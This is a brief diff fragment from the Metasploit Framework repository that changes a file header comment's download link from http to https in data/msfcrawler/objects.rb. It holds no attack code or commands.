+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

data/msfcrawler/objects.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##